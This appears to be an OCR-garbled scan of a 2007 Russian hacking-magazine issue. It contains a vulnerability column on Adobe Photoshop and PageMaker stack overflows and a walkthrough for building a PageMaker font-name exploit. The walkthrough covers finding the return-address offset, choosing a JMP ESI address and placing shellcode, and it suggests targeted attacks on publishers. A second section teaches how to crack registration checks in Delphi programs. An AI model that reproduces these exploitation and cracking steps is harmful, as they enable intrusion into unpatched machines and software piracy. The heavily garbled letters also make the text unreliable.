в РЬоІовЬор’е/ІІІивІхаІог'е. На 
этот раз — в парсере ВМР, йІВ и 
РЬЕ-файлов. Вполне классическая 
ситуация. Тривиальное стековое 
переполнение, допускающее 
возможность передачи управления 
на зЬеІІ-код, расположенный здесь 
же, в переполняемом буфере. Под 
ѴѴ2К атака реализуется на ура без 
каких бы то ни было осложнений. ХР 
5Р2 с аппаратной поддержкой йЕР, 
задействованной для всех прило- 
жений (по умолчанию йЕР включен 
только для системных процессов и 
некоторых родных ѴѴіпсІоѵѵз-про- 
граммтипа ІЕ], ломается чуть-чуть 
сложнее, и для обхода защиты 
от неисполняемого стека нам 
приходится прибегать к атаке типа 
геІигп21іЬс (смотри ЬНрУ/пегиті.ога. 
ги/гд-пх.ипсепзогесі.гір і. А вот Виста 
и Эегѵег 2008 уже создают хакеру се- 
рьезную преграду, поскольку рандо- 
мизируют адресное пространство, 
и, чтобы передать управление на 
збеіі-код, приходится не по-детски 
извращаться. Перспективы атаки в 
целом представляются не слишком 
обнадеживающими — РЬоІозІюр с 
Іііизіхаіог’ом не самые распростра- 
ненные среди пользователей про- 
граммы. Зато для целенаправлен- 
ных атак на различные издательства 
и дизайн-студии разворачивается 
совсем нехилое поле деятельности, 
тем более что расширение файла не 
играет никакой роли и для маски- 
ровки ВМР можно переименовать 
в^б (рассылка ВМР вызываетоп- 
ределенные подозрения, поскольку 
это не самый популярный формат 
среди профи]. Более подробную ин- 
формацию о дыре можно нарыть на 



уууууу.зесипМосиз.сот/Ыс1/23621 



|>> Тагде1з| 



Дыра подтверждена в АбоЬе 
РЬоІозЬор С52/С53, АбоЬе 
I НизЕгаЕог С53 и АбоЬе боБіѵе 9. 



|>> ЕхрІоіЦ 



Ргооі-оі'-сопсері: эксплойт, зато- 
ченный хакером Магзи и протес- 
тированный подХР5Р2, лежит 
на ѵѵѵѵѵѵ.зесигіЫосиз.сот/баІа/ 
ѵи[пегаЫ[Щез/ехр[оіІ5/23621 .с . В 
случае успешной работы он запус- 
кает калькулятор (кто его только не 
запускает... — прим. РогЬ’а). 



>> Зоіиііоп 



Установить обновление для соот- 
ветствующего продукта, загрузив 
его с сервера ѵѵѵѵѵѵ.асІоЬе.сот . 

РА6ЕМАКЕК: 



9 октября 2007 года кита- 
ец... нет, не китаец, а уже японец! 
ЯпонецТап СЬеѵѵ Кеопд обнаружил 
в РадеМакег’е ошибку переполне- 
ния стека, вызываемую длинными 
именами шрифтов, сохраненными 
в ртб-файлах, и обнародовал 
эксплойт, но спустя короткое время 
убрал его из публичного доступа. 
Вотсу... суровый человек! Впро- 
чем, я написал свой собственный 
(но об этом ниже). Дефектсидитв 
динамической библиотеке МАІРМ6. 
сІИ и не представляетсобой ничего 
интересного. Ну подумаешь, забыли 
проверить длину фонта передего 
копированием в буфер. РадеМакег 
также не относится к широко распро- 




страненным программам, и об этой 
ошибке можно было бы и забыть, по 
ходу дела списав ее в утиль, если 
бы не одно важное обстоятельство. 
РадеМакег широко используется 
в издательствах и других крупных 
фирмах, обменивающихся макетами 
и файлами презентаций в формате 
ртб, причем количество незалатан- 
ных машин, на которыхустановлен 
дырявый РадеМакег, не поддается 
никакому учету! Поскольку нарыть в 
Сети техническую информацию об 
уязвимости не удалось, я (вовлечен- 
ный в очередной виток пен-тестинга) 
занялся самостоятельной исследо- 
вательской деятельностью. 



|>>Тагде1з| 



В настоящее время уязвимость 
подтверждена в АбоЬе РадеМакег 
7. 0.1/7. 0.2; другие версии не прове- 
рялись, но есть все основания пола- 
гать, что дыра присутствует и там. 



|>> Ехріоід 



Демонстрационный эксплойт, вызы- 
вающий инструкцию ІЫТ ОЗЬ, лежит 



на ЬирѴ/пегиті.ога.ги/зоигіг/Ьаск/ 
пеги ті-радетакег-МАІРМб-Ьид ,7г . 
Он протестирован под\/Ѵ2К и должен 
работать подХР в конфигурации 
по умолчанию (если задействован 
аппаратный ОЕР для всех приложе- 
ний, эксплойт следует доработать, 
задействовав атаку типа геІигп21іЬс). 



»5оІи*іоп 



Установить обновленную версию 
динамической библиотеки МАІРМ6. 
сІИ, выпущенную производителем: 
ѵѵѵѵѵѵ.абоЬе.согп/зиррогіУзесигіІіѵ/ 
ЬиІМіпз/сіоѵѵпІоасІз/МАІРМб.гір . 

Р1Л.1. РІ5СІ.05Е 

Для экспериментов нам понадо- 
бится РадеМакег7.х, 30-дневную 
испытательную версию которого 
можно бесплатно скачатьу АбоЬе, 
предварительно зарегистрировав 
там халявный аккаунт ( ЫіІрзУ/ѵѵѵѵѵѵ. 
абоЬе.сот/сіизіопЛбгс/іпсіех. 
с1 : т?І.ос=еп%5Би5&ргосіис1:=раае 
такег ). Если хочешь сэкономить 
64 Мбтрафика, возьми его с диска, 
прилагаемого кжурналу. 
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Установка не вызывает никаких проблем и проходит без сучка и задоринки. 
Чтобы не засирать машину всяким барахлом, рекомендуется использовать 
ѴМ\л/аге или другой эмулятор подобного типа, особенно еслиты не собира- 
ешься работать с РадеМакег'ом в дальнейшем. 

И вот этот монстр установлен! Запускаем Ргп70.ехе и выбираем какой-ни- 
будь шаблон проекта, немного поиздевавшись над которым, сохраняем на 
диске расширением ртб (например, пеіиті.ртсі). На этом подготовитель- 
ные мероприятия можно считать законченными. Мы получили файл, над 
которым будем медитировать на протяжении всей статьи. 

Открываем пеіиті.ртсі в Ыеѵѵ’е и ищем там какое-нибудь имя шрифта, 
например Соигіег, и ведь находим его по смещению 24В06. Естественно, 
в зависимости от структуры файла это смещение может и другим, но это 
неважно. Покалишь просто запомним его, попутно обратив внимание на 
непонятную, но очень интересную структуру а-ля «1 :) :) :] :) :)», расположен- 
ную чуть ниже. Позже она нам очень понадобится! 

Впрочем, не будем забегать вперед и вернемся в настоящее время. А в 
настоящем времени мы нажимаем <РЗ> (ЕсПі) и дописываем кСоигіегдлин- 
ный ряд шестерок, затирающий своим хвостом структуру «1 :) :] :) :) :)». Если 
переполнять, то уж наверняка. Почему именно шестерки? Просто нравятся 
они мне! Большинство хакеров использует для переполнения последова- 
тельность «ААА...ААА», что работает ничуть не хуже. Кстати, прежде чем 
затирать файл, его рекомендуется скопировать, например в пегиті-З.ртсІ, 
чтобы сохранить оригинал для возможности отката. Теперь сохраняем 
изменения по <Р9> и выходим. 

Загружаем пегиті-З.ртсІ в РадеМакег (если нас спросят: «Ореп 1Ье тові 
гесеп1ѵег5Іоп?», отвечаем: «N 0 , іЬапкуои») и получаем крэш: «Инструкция 
по адресу 0x36363636 обратилась к памяти по адресу 0x36363636. Память не 
можетбыть геаб». Что это значит?! 36Ь — Ьех-код АЗСІІ-символа 6. Инструк- 
ция по адресу 36363636И не собиралась читать память по адресу 363636366, 



это она сама не может быть прочитана процессором, потому что такой памя- 
ти нет, точнее, она не выделена. Тот факт, что регистр ЕІР (указатель команд) 
принял значение 363636366, говоритотом, что затираемый код перекрыл 
собой адрес возврата из функции, на который мы можем воздействовать, 
передавая управление туда, куда нам заблагорассудится! 

Для дальнейших экспериментов нам понадобится какой-нибудь отладчик, 
например бесплатный ОНуОеЬиддег ( ѵѵѵѵѵѵ.оЦѵсіЬа.сІе ) или его хакнутый 
клон ІттипіТу ОеЬиддегс поддержкой скриптов, написанных на Питоне 
[ бКр://сІеЬиааег.іттипіЫпс.сот/геаІ5іег.біт[ ). Лично я ненавижу Питон 
еще с того дня, когда обнаружил, что тот относится к форматированию 
листинга также строго, какСи ксоблюдению регистра. Впрочем, при 
желании можно обойтись и штатным Доктором Ватсоном. Устанавливаем 
ОІАуОЬд и назначаем его _)и5І-іп-Тіте ОеЬиддег’ом, также называемым 
Розі-Могіеп отладчиком, то есть отладчиком, вызываемым после краха 
приложения («Орііопз -> -ІивЫп-Тіте ОеЬиддіпд, Маке 0 Ну -ІизЫп-Тіте 
ОеЬиддег, СопЛгт Ьеіоге аЛасЫпд»), После этого повторяем открытие 
файла пеіиті-З.ртс! вновь, нажимая «Отмену» для вызова отладчика. 

В окне СРІ) пусто, и это нормально, поскольку памяти, на которую указывает 
регистр ЕІР (равный 3636363636), какуже говорилось, нети показывать 
здесь нечего. Смотрим на стек. Регистр Е5Р (равный 001 20Р8С6) указывает 
на строку «6666», которой забит верх стека. Регистр Е5І также указывает на 
«6666», но, судя по его значению (0400С2В46), эта копия строки располо- 
жена не в стеке, а в куче (выяснить это нам поможет карта памяти, вызыва- 
емая по <АІ1-М>) — это очень важное обстоятельство, которое выручит нас 
в дальнейшем. Регистр ЕБІ также смотрит в кучу (040002706), но указывает 
непосредственно на само имя шрифта Соигіегббббб, тогда как Е5І — куда-то 
на его середину. 

Перейдем кследующей фазе атаки — попробуем выяснить, какой именно 
по счету байт перекрывает адрес возврата. Один из способов сделать это 
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|Тянем-потянем АбоЬе Маде Макеги никак не утянем)'; 



— воспользоваться «бегущей строкой», изменяющейся на всем своем про- 
тяжении. Для приблизительного определения дислокации адреса возврата 
поверх шестерокзапишем «ААА...ВВВ...ССС». 

Загружаем обновленный файл в РадеМакег, и крэш мистическим образом 
исчезает. Какже это так? Очень просто — по-видимому, буквенная ком- 
бинация, перекрывшая адрес возврата, совершенно случайно указала 
на вменяемую область памяти! Рехнуться можно! Нотакова наша ха- 
керская жизнь. Сплошные сюрпризы. Ладно, меняем «АААВВВССС» на 



«111 222333», надеясь, что на этот раз нам повезет. 

И точно! Теперь исключение выпрыгивает по адресу 323232326, что 
соответствует последовательности « 222 ». Очень хорошо! Самое время для 
сужения сектора поиска. Меняем «222» на «РР РЕ РР РО РР Р8 РР Р7». Есте- 
ственно, эта последовательность может быть и другой. РІикакого принужде- 
ния тут нет. Главное, чтобы мы точно смогли определить локацию двойного 
слова, попадающего в адрес возврата. 

На этот раз исключение выпрыгивает по адресу Р7РРР8РРН, из чего можно 



Бегущая строка тонкой настройки^ 
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«Бегущая строка»! 



заключить, что в адрес возврата попадают последние четыре байта. 
Нажимаем «Отмену» для вызова отладчика и смотрим на содержимое регис- 
тров и сте ка , а в сте ке у н а с соде ржится «44455 5».Приехали!В сте к п о п а да ет 
буферная память, находящаяся за подменяемым адресом возврата, и, если в 
адресе возврата окажется хотя бы один нулевой символ, он будет воспринят как 
завершитель строки и остаток переполняемого буфера в стек просто не попадет! 
Не попадет— и черте ним! В конце концов, можно выбрать такой адрес 
возврата, чтобы без нулей. Например, передать управление на АРІ- 
функцию ТегтіпаІеРгосезз, чтобы аккуратно захлопнуть РадеМакег при 
открытии файла без сохранения данных. Невелика подлость, но для начала 
сгодится и это. Находясь в отладчике, давим <АІІ-Е> (ЕхесиІаЫе Мосіиіез), 
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находим там КЕРМЕІ_32.0І_І_, которая и экспортируетТегтіпаІіеРгосезз 
(смотри РІаЙогт 5йК или кури Рихтера), и пишем «Тегтіпа1;еРгосе55» для 
быстрого поиска обозначенной функции, в ѴѴ2К расположенной по адресу 
77Е8225СИ. 

Открываем наш многострадальный файл в Ыеѵѵ’е и меняем «РРЬ Р8Ь РРЬ Р76» 
на «5СЬ 226 Е86 776» (адрес 77Е8225С6, записанный задом наперед сучетом 
порядка следования байтв двойном слове). Сохраняем изменения по <Р9>, 
выходим из Ьіеѵѵ’а, грузим файл в РадеМакег и получаем неожиданный крэш 
по адресу 57Е8225С6. Что это за ботва такая и откуда она вообще приплыла?! 
Смотрим — ага, совпадают все байты, только 776 магическим образом превра- 
тилось в 57Ь. Убеждаемся, что 6ех-код776 соответствует сим волу «ѵѵ», а 576 
— «ѴѴ», то есть наш подопытный РадеМакег перед копированием шрифтов 
переводит их имя в верхний регистр — ну чтобы искать легче было (какут- 
верждаетРІабюгтЗСКотМЗ, шрифты нечувствительны к регистру, и потому, 
чтобы исключить неоднозначность, регистр должен быть один). 

Таким образом, наша задача очень сильно осложняется — необходимо 
выбрать такой адрес возврата, чтобы в нем не было символов нижнего 
регистра. Но это ерунда. Самый главный вопрос — где располагатьзбеіі- 
код. Смотрим на значение остальных регистров. Так-так-так... Регистр Е5І 
указывает на подстроку «444555», расположенную в куче. Отсюда возникает 
идея поместить збеіі-код, начиная со строки «444», а в качестве адреса 
возврата подсунуть адрес инструкции ЗМР Е5І с опкодом РР Е6, который 
легко отыскать в памяти процесса. 

Какая по счету четверка попадает в Е5І? На этот вопрос можно ответить сразу, 
просто подсчитав количество четверок, расположенных до первой пятерки. 
Их будет ровно 1 2. А мы вбивали 1 6. Следовательно, Е5І указывает на третью 
четверку, считая от нуля. Между прочим, именно по этому адресу располага- 
ласьта загадочная структура «1 :) :) :) :) :)», назначение которой мы не выясни- 
ли до сих пор, но которая нас очень здорово выручает, поскольку копируется в 
кучу независимо от наличия нулевых символов в имени шрифта. 

Короче, кончаем болтать и приступаем к поиску ЗМР Е8І. Для этого в списке 
исполняемых модулей выбираем РМ70.ЕХЕ, нажимаем на <ЕІМТЕВ> для 
перехода в его начало и давим <С1х1-В> для форсирования двоичного по- 
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|ртсІ-файл после затирания хвоста имени шрифта| 



иска последовательности «РРб Р6Ь». Клавиши <СМ-І_> продолжают поиск. 
В общем, нам подойдетлюбой адрес. Главное, чтобы он: а) не содержал 
символов нижней строки; б] находился в пределах модуля РМ70.ЕХЕ. 
Последнее обстоятельство обеспечивает переносимость эксплойта между 
системами, поскольку базовый адрес загрузки РМ70.ЕХЕ всегда постоян- 
ный, где бы он ни был, а это значит, что постоянным будет и адрес команды 
ЛЧР Е5І, найденный внутри него. 

Вполне подходящий вариант расположен по адресу 005Е0ВЕ76, который 
в символьном виде выглядит как«ч> л ». И хотя «ч» находится в нижнем 
регистре, будем надеяться, что американский РадеМакегс особенностями 
национального характера русского хакера не знаком и вообще не втеме. 

Ну, поехали! Заменяем «ЕРЬ Р8Ь ЕРЬ Р7Ь» на «Е7И ОВЬ 5ЕЬ ООН», а втретий 
(считая от нуля) байт последовательности «444» внедряем наш зЬеІІ-код, 



которым для простоты будетмашинная инструкция ІЫТ ОЗЬ (опкод ОСЬ). 
Последняя при выполнении должна вызывать исключение 800000036, 
что послужит доказательством корректности работы эксплойта. В общем, 
финальный вариант должен выглядеть так, как показано на рисунке. 
Загружаем сформированный файл (его можно взять с ЬіірѴ/пегиті.ога. 
ги/5оигІ2/Ьаск/пе2иті-рааетакег-МАІРМ6-Ьиа.72 ) в РадеМакеги ловим 
исключение 80000003И, как и предполагалось ранее. Естественно, ІЫТ ОЗЬ 
— очень простой зЬеІІ-код и его можно заменить любым другим боевым 
зарядом, взятым с ѵѵѵѵѵѵ.гпіІѵѵОгт.согп или написанным самостоятельно. В 
Сети валяется куча зЬеІІ-кодов, устанавливающих бэкдор или делающих 
разные прикольные дела, остающиеся на совести их разработчиков. Но 
меня это не интересует. Я подготовил публичный эксплойт, объяснив, с 
какой позиции туда внедрять зЬеІІ-код, чем и доволен, т 
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ИЗЯЩНАЯ ДЕКОМПИЛЯЦИЯ ЦЕІ.РНІ 



Начинающие хакеры обычно испытывают большие трудности при взломе программ, 
написанных на ОеІрЬі и Виіісіег, поскольку классические трюки типа бряка на 
СеН/ѴІпсІоѵѵТехіА не работают. И чтобы не пилить серпом по яйцам, требуется учитывать 
особенности библиотеки ѴСЬ, которая только с виду кажется неприступной, а в действи- 



тельности ломается даже проще, чем чистые 

г ДЛЯ НАЧАЛА... 

Два основных орудия хакера — это отладчик и дизассемблер, которые могут 
использоваться как по отдельности, так и совместно друге другом. Первая 
(и самая сложная) фаза атаки — разведывательная. Прежде чем наносить 
основной удар по врагу, необходимо локализовать защитный механизм в 
мегабайтах мирного программного кода, после чего выстелить битхаком, 
поменяв ^ на ^Е.либо, разобравшись с алгоритмом процедуры регистра- 
ции, написать свой собственный генератор ключей/серийных номеров. 
Ударная фаза практически не зависит отспецифики ломаемого приложе- 
ния и отрабатывается годами, представляя собой неромантичный кропот- 
ливыйтруд, а вотпроведение комплекса разведывательных мероприятий 
— гораздо более интеллектуальное занятие, требующее хитрых мозгов и, 
конечно же, хвойно-новогодних опилок, которые мы будем настойчиво 
курить. И ожесточенно долбить. По клавиатуре! Ведь Новый год — семей- 
ный праздник, и всякий уважающий себя хакер проводитего наедине с 



Си-программы! Не веришь? Убедись сам! 

самым близким ему существом — компьютером. Для создания атмосферы 
праздника нужно будет зажечь свечи (нете, что от геморроя), послать всех 
девушек в /беѵ/пиіі, зарядить бурбулятор свежей порцией гпап'ов и начать 
маньячить. Ведь юзеры ждут подарков, а лучшего подарка, чем новый кряк, 
для компьютерщика, пожалуй, и не придумаешь! 

Короче, надо хачить. Поехали! 

^ ОСВАИВАЕМ РЕйЕ 

Оейе — это такой декомпилятор программ, написанных на ОеІрЫ и 
Виіібег'е. Бесплатный и очень мощный. Мы будем использовать менее про- 
цента от его возможностей. Кто там говорит, что это расточительство? Нет, 
расточительство — это выбрасывать елку в мусор после праздника. Полная 
декомпиляция в наши задачи не входит. Наша цель — локализация дисло- 
кации штаб-квартиры защитного механизма, то есть определение адресов 
процедур, проверяющих введенный пользователем регистрационный 
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номер. Вот для этого нам и нужен РеРе, а все остальное можно сделать и 
руками. То есть дизассемблером. Вообще-то, в состав РеРе входит интег- 
рированный дизассемблер в духе ѴѴІЫ32РА5М, однако по своему качеству 
он значительно уступает даже халявной версии ЮА, не говоря уже о полном 
боекомплекте тяжелой артиллерии в виде ЮА Рго + БоШСЕ. Это просто ужас 
какой-то! Это все равно что засунуть еловую ветку Стиву Б. в задницу, даже 
круче! Намного круче! :) 

Последняя известная мне версия РеРе носит порядковый номер 3.50.02 
и датируется серединой 2003 года. Похоже, что РаРіхег полностью утратил 
интерес к своему детищу, решив похоронить РеРе на свалке истории. 
Полные исходные тексты версии 3.1 0Ь выложены в публичный доступ, 
однако желающих продолжить благородное дело что-то не наблюдается, и 
потому РеРе обречен на медленное и мучительное вымирание. Программы, 
собранные новыми компиляторами от Багдада, РеРе либо вообще не пере- 
варивает, либо декомпилируетнеправильно (вотпотому чуть позже мы рас- 
смотрим, какломать Борландию своими руками без посторонней помощи). 
Архив РеРе.З.ІОЬ.геаІу.сотрІеІе.вгс.гір (который, в частности, можно скачать с 
ѵ\Аллл/.ѵѵа5пп.ги/ЬаіхасІо.рІ~ір?тосІе=1:оо[&ісІ=55 ) на самом деле не совсем полон, в 
нем отсутствует пара компонентов: НхиЬ_ѵ2.75плюсѴСІ_2ір. И прежде чем РеРе 
удастся собрать, их необходимо найти в интернете. Если же ты не собираешься 
заниматься доработкой РеРе. то лучше скачать с \ллмл/.хакер.ги/ро5І/1 8513/ 
сІеіаиНазр архив без исходныхтекстов, который на два метра короче. 

В общем, значит, ставим мы РеРе и втыкаем в его философию. Афилософия 
эта такова, что декомпиляции подвергается не сам исполняемый файл, 
а образ запущенного процесса в памяти, за счет чего удается раздавить 
упаковщики, даже не почувствовав их присутствия. Впрочем, против крутых 
протекторов, шифрующих защищенную программу в памяти и динамически 
расшифровывающих ее по мере исполнения, РеРе оказывается бессилен, 
и врядли стоит объяснять почему. Однако крутые протекторы на практике 
встречаются не такуж часто, что очень радует. 

Ладно, не будем впадать в депрессию. Ведь Новый год на дворе! И пока 
остальные рвут петарды, мы будем рвать себе задницу, декомпилируя инте- 
ресные программы :). Все очень просто! Берем прогу, загружаем ее в РеРе, 
давим на кнопку «Процесс» и сидим себе в ожидании, пока РеРе распотро- 
шит дамп памяти. Лучше всего это делать под ѴМѵѵаге, это среди защищен- 
ных программ есть всякиетвари, начиненные АбѴѴаге и прочей малварью. 
Честно говоря, я поубивал бы тех, кто придумал механизм идентификации 
типов в рантайме, благодаря которому названия классов не уничтожаются 
при компиляции (какв классическом Паскале и Си), а попадаютнепо- 
средственно в исполняемый файл (как в Ѵізиаі Вазіс'е). Взлом упрощается 
настолько, что ломать становится скучно. Никакого тебе интеллектуального 
поединка. Все равно что ломом добивать попавшую в капкан мышь. 

Но мы же не садисты и не маньяки какие-нибудь. Оставим мышь любоваться 
праздничным салютом, а сами вернемся кРеРе. Самая левая (можно даже 
сказать: радикально левая) вкладка с именами классов не содержит для нас 
ничего интересного. Вкладки Ііпііъ ІЫо и Рогтзтакже отправляются в/беѵ/ 
пиііили куда поглубже. А вот вкладка Ргосесіигез — это уже то, что нужно. 



Открываем ее и смотрим. Ага, здесь перечислены юниты со всеми проце- 
дурами в них содержащимися. Причем и сами юниты, и имена классов, и 
названия событий (еѵепЫ даны в символьном виде. То есть если в про- 
грамме есть диалоговое окно регистрации, то РеРе покажет что-то типа: 
{Редіз^ег ? ТІттРедізІег ? ЬО КС Иск. Как нетрудно догадаться, ЬО КС Иск 
— это и есть имя процедуры, получающей управление при нажатии на 
кнопку О К и занимающейся проверкой валидности введенного юзером 
серийного номера. Тутже в колонке ПѴА РеРе показываетее относитель- 
ный виртуальный адрес, по которому функцию легко найти в файле. 

А можно и не искать! Двойной щелчок по имени функции открываетокно 
с интегрированным дизассемблером, перемещая наш хвост непос- 
редственно на зловредный защищенный код, что особенно полезно при 
анализе упакованных файлов, которые бессмысленно загружать в Иду. 
РеРе дизассемблирует дамп памяти, и потому упаковщики идутлесом. 

Как вариант — можно заюзать БоШСЕ, установив по заданному адресу 
ап па ратную точку останова (команда «ВРМ адрес X»). Необходимо только 
помнить, что РѴА — это относительный виртуальный адрес, а БоЛІСЕ 
требуетабсолютного. Чтобы перевести относительный виртуальный адрес 
в абсолютный, достаточно загрузить файл в Ьіеѵѵ, нажать <Р8> (беасіег), 
посмотреть на базовый адрес загрузки (базе аббгезэ) и сложить его с РѴА- 
адресом, сообщенным РеРе. 

г ТЕХНИКА РУЧНОГО ВЗЛОМА 

Ураганный артиллерийский огонь декомпилятора РеРе накрываетпракти- 
чески весь Багдад, ставя моджахедов по стойке смирно, а всех несогласных 
отправляет на север, где они рубят пихтовый лес и гонят драп, чтобы у 
всех плановых жителей было по елке. В смысле ПО «Елки», программное 
обеспечението есть :). 

Недостатка у РеРе как минимум два. Первый: ломать автоматом — это не в 
кайф и вообще не по понятиям. Настоящие хакеры так не поступают, пред- 
почитая во всем разбираться самостоятельно с помощью кедрового отвара 
изхрюнделя (в просторечии называемого Ыеѵ/ом) и топора. Второй: как 
уже говорилось, РеРе обречен на вымирание и скоро исчезнет с жестких 
дисков за ненадобностью, как в свое время исчезли динозавры и мамонты. 
А потому во многих ситуациях ручной взлом оказывается намного предпоч- 
тительнее, а бываеттак, что он становится вообще единственно возможным 
вариантом. Короче, кто как, а я сразу за демократию! Любовь и ІРА Рго — во! 
Берем, значит, Иду, переходим в начало сегмента данных (Ѵіеѵѵ\Ореп 
зиЬѵіеѵѵзѴэедтепіз или <5ЫЛ-Р7>) и прокручиваем его вниз дотехпор, 
пока не встретим текстовые названия элементов управления с прилегаю- 
щими к ним ссылками. Дизассемблерный текст должен выглядеть так, как 
показано ниже. 

НАЗВАНИЯ МЕТОДОВ КЛАССА ФОРМЫ В ИСПОЛНЯЕМОМ ФАЙЛЕ 

ПРЯМЫМ ТЕКСТОМ 

. йаСа : 0040Е88В ж>гс1_40Е88В сіѵ? ОВЬ 

. сІаСа : 0040Е88Б СІѴ7 ІІЪ. 
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► 061 



взлом 



>> 




Интегрированный дизассемблер декомпилятора йейе 





Вкладка Ргосесіигез декомпилятора йейе 




> Ііпкз 

Последний релиз 
йейе ѵ. 3.50.02 ты 
можешь скачать с 
нашего сайта ѵѵѵѵѵѵ. 
ха кер. ги/ро5І:/ 18513/ 
сіеіаиіб.азр или взять 
наОѴО. 



. баба : 0040Е88Е бб оГбзеб _ТРогт1_РогтСгеабе 
.баба: 0040Е893 6Ъ 10 , ' РогтСгеабе ' 

. баба : 0040Е89Е дм 12Ь 

. баба : 0040Е8А0 бб оГбзеб _ТРогт1_РогтБезбгоу 
. баба : 0040Е8А4 6Ъ 11, ' РогшБезбгоу 1 
. баба : 0040Е8В0 бм 17Ь 



. баба : 0040Е8В2 (1(1 
СоттІКесеіѵеВаба 
. баба : 0040Е8В6 6Ъ 
. баба : 0040Е8С7 бм 
.баба: 0040Е8С9 бб 
. баба : 0040Е8СБ 6Ь 
. баба : 0040Е8БА бм 
. баба : 0040Е8БС бб 
.баба: 0040Е8Е0 6Ь 
. баба : 0040Е8ЕБ бм 
.баба: 0040Е8ЕР бб 
.баба: 0040Е8РЗ 6Ь 
. баба : 0040Е900 бѵ7 
. баба : 0040Е902 бб 
.баба: 0040Е906 6Ь 
. баба : 0040Е912 бм 



оГбзеб _ТРогш1_ 

16, ' СогпшІВесеіѵеВаба ' 

ІЗЬ 

оГбзеб _ТРогш1_Виббоп1СІіск 
12, ' ВиббопІСІіск ' 

ІЗЬ 

оббзеб _ТРогш1_Виббоп4СІіск 
12, ' Виббоп4СІіск ' 

ІЗЬ 

оббзеб _ТРогш1_Виббоп2СІіск 
12, ' Виббоп2СІіск ' 

12Ь 

оббзеб _ТРогш1_Тішег1Тішег 
11, ' ТішегІТішег ' 

ІЗЬ 




► 0б2 



Р е 1 р И і - это что-то для 
некрофилов. Гнилой про- 
дукт, умерший еще при 
родах . 




Чувак, согласен, конечно. 
Но, как ни крути, софта, 
написанного на РеІрНі , 
полно, причем программы 
бывают реально крутые. 

Так что статья в тему, 
имхо . 



. баба : 0040Е914 бб оббзеб _ТРогш1_ВиббопЗСІіск 
.баба: 0040Е918 6Ь 12, ' ВиббопЗСІіск ' 

.баба: 0040Е925 дм ІЗЬ 

. баба : 0040Е927 бб оббзеб _ТРогш1_Виббоп5СІіск 
. баба : 0040Е92В 6Ь 12, ' Виббоп5СІіск ' 

.баба: 0040Е938 бѵ? ІЗЬ 

. баба : 0040Е93А бб оббзеб _ТРогш1_Виббоп6СІіск 
.баба: 0040Е93Е 6Ь 12, ' ВиббопбСІіск ' 

.баба: 0040Е94В бѵ? ІЗЬ 

. баба : 0040Е94Б бб оббзеб _ТРогш1_Виббоп7СІіск 
. баба : 0040Е951 6Ь 12, ' Виббоп7СІіск ' 

. баба : 0040Е95Е аТбогшІ 6Ь б, ' ТРогшІ' ; БАТА 
ХКЕР: .баба: 0040Еб1С л о 

Скажем сразу, это довольно сложный для взлома случай, 
поскольку программистиспользовал названия элементов 
поумолчанию, потому и получилось ТРогтІ , Виббоп 1 Сііск, 
ВиЬоп2СІіск. Это не названия кнопок, это названия методов 
класса, отвечающих за обработку нажатий кнопок, а вот каким 
реально кнопкам они соответствуют, так сразу и не скажешь, 
поэтому придется хитрить. 

Перемещаем курсор на название функции, автоматически 
назначенное Идой на основетекстовой строки (например, 
«_ТЕогт1_ВииопЗСІіск»), и нажимаем <ЕпІег>, переходя на 
ее тело, где мы видим, что функция расположена по адресу, ну 
скажем, 04028605. Загружаем файл в Ьіеѵѵ, нажимаем <Еп1ег> 
для перехода в шестнадцатеричный режим, давим <Р5> (добо] 
и вводим адрес перехода (в данном случае «.040286С»). Точка 
в начале адреса сообщает Ьіеѵѵ’у, что это действительно 
адрес, а не смещение (поумолчанию). Активируем режим 
редактирования по <РЗ> (Егііі) и пишем СС — опкод точки 
останова, соответствующий машинной команде ІЫТ ОЗЬ. 
Сохраняем изменения по <Р9> и выходим. 

Запускаем программу, вызываем обозначенную формуй 
давим по очереди на все кнопки. Когда мы нажмем ВиНопЗ, на 
экран выскочит системное сообщение отом, чтоу программы 
рвет крышу и она будет аварийно завершена в добровольно- 
принудительном порядке. Так и должно быть. В отсутствие 
отладчика команда ІЫТ ОЗЬ приводит к критической ошибке, 
что позволяет довольно быстро найти необходимые нам 
кнопки, после чего останется только хакнуть соответствующие 
им функции. Логично? Всенепременно! 

Естественно, ручной просмотр секции данных непродук- 
тивен и ненадежен. Таклегко проглядеть нужные нам 

ХАКЕР 12 /108/ 07 





формы, особенно если программист обозвал методы классов короткими 
и невыразительными именами, особо не бросающимися в глаза, типа 
а, Ь, с. Как быть тогда? Очень просто! Указатель на вышеприведенную 
структуру передается библиотечной ѴСІ_-функции Рогтз-ТАррІісаТоп:: 
СгеаІ:еРогпп(5у5І:ет::ТМе1;аСІа55 *,ѵоісІ*) в качестве одного из аргумен- 
тов. ЮА распознает ѴСІ_-функции по сигнатурам, автоматически назна- 
чая им «неразман тленные» имена. Применительно к нашему случаю это 
будет йРогт5ЙТАррІісаііопгаСгеаІеРогпп$рргр1 75узІ:етйТМе1:аС[а55рѵ. 
Просто находим эту функцию и смотрим все перекрестные ссылки, 
ведущие к местам ее вызова из программного кода. Ни одна форма не 
уйдет незамеченной! 

Хорошо, а как быть, если в нашем распоряжении нету Иды, а есть 
только Ьіеѵѵ? Первая мысль — идти топиться — отметается как идеоло- 
гически неправильная. Топиться в Новый год — это по меньшей мере 
негуманно. У всех людей праздник, настроение соответствующие, и 
тут бац — дохлый труп с порезанными венами в ванной. Неэстетично! 
Таким путем мы приходим ко второй мысли: бедность — это не порок, а 
естественное студенческое состояние; и все, что нас не убивает, дела- 
ет нас сильнее. Хорошо подумав головой, мы сумеем обойтись одним 
Ьіеѵѵ'ом. Хотя почему бы на Новый год не подарить себе любимому 
лицензионную Иду? 

Ладно, Ьіеѵѵтак Ьіеѵѵ. Это только с виду кажется, что Ьіеѵѵ — беспонтовая 
программа. На самом деле это очень даже мощный зверьтипа «гепард». 
Сильный и шустрый. Ктомуже компактный. Правда, увы, с некоторых пор 
далеко не бесплатный. Но найти Ьіеѵѵ намного проще, чем Иду. Да и стоит 
Ьіеѵѵ несоизмеримо дешевле, чем ЮА Рго (это при его-то возможностях). 
Короче, пока над нашими головами разрываются петарды и прочая 
реактивная китайская пиротехника, залетающая через открытую фор- 
точку, мы загружаем ломаемую программу в Ьіеѵѵ, нажимаем <Еп1ег> для 
перехода в шестнадцатеричный режим, давим <Р8> (Неасіег), говорим 

<Р7> (Ітрогі) и в списке импортируемых функций находим ітр_й 

РогтвйТАрр[іса1;іопйСгеа1;еРогт$рргр1 7Буз1:ет0ТМе1:аСІ.а55рѵ, 
поставляемую динамической библиотекой ѵсІХХ.ЬрІ, где XX — номер 
версии, например 60. По <Еп1ег> переходим ктаблице переходников 
